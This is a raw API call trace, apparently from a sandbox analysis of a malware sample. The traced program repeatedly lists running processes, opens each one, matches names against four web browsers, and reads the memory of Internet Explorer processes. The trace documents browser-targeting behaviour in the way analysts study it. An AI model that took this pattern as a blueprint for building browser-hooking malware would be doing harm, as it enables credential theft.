	[0202.220] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.220] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0202.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.221] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.221] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0202.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x21dc
	[0202.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.222] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0202.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.222] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.222] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0202.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.223] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.223] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0202.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x21e0
	[0202.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.224] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0202.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.224] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.225] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0202.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.225] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.226] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0202.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x21e4
	[0202.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.227] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0202.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.227] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.227] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0202.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.227] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.228] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0202.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x21e8
	[0202.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.228] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0202.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.229] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.229] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0202.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.230] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.230] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0202.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x21ec
	[0202.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.231] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0202.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.231] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.232] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0202.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.232] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.232] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0202.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x21f0
	[0202.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.233] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0202.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.234] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.234] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0202.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.234] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.234] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0202.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x21f4
	[0202.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.235] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0202.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.235] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.236] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0202.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.236] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.236] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0202.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x21f8
	[0202.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.237] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0202.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.237] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.238] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0202.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.238] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.239] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0202.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x21fc
	[0202.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.242] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0202.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.243] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.244] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0202.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.244] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.245] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0202.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2200
	[0202.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.245] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0202.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.246] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.246] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0202.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.247] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.247] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0202.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2204
	[0202.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.248] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0202.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.249] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.249] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0202.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.250] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.251] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0202.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2208
	[0202.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.251] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0202.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.252] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.252] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0202.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.253] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.253] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x220c
	[0202.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.254] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.254] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.255] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.255] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.255] NtQueryInformationProcess (in: ProcessHandle=0x220c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.255] ReadProcessMemory (in: hProcess=0x220c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.255] ReadProcessMemory (in: hProcess=0x220c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.255] ReadProcessMemory (in: hProcess=0x220c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.255] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.256] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2210
	[0202.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.256] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.257] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.257] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.257] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.257] NtQueryInformationProcess (in: ProcessHandle=0x2210, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.258] ReadProcessMemory (in: hProcess=0x2210, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.258] ReadProcessMemory (in: hProcess=0x2210, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.258] ReadProcessMemory (in: hProcess=0x2210, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.258] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.258] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2214
	[0202.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.259] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.259] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.259] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.260] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.260] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0202.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2218
	[0202.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.261] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0202.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.261] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.261] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0202.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.262] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.262] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x221c
	[0202.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.263] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.263] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.263] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.264] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.264] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.264] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0202.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x2220
	[0202.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.265] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.266] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.266] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.266] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.266] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2224
	[0202.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.267] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.267] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.268] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.268] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.268] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0202.269] CloseHandle (hObject=0x188) returned 1
	[0202.269] Sleep (dwMilliseconds=0x64) 
	[0202.364] GetCurrentProcessId () returned 0x110
	[0202.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0202.368] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0202.370] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0202.371] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0202.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2228
	[0202.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.373] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.373] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.374] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.374] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.375] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x222c
	[0202.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.376] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.377] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.377] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.378] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
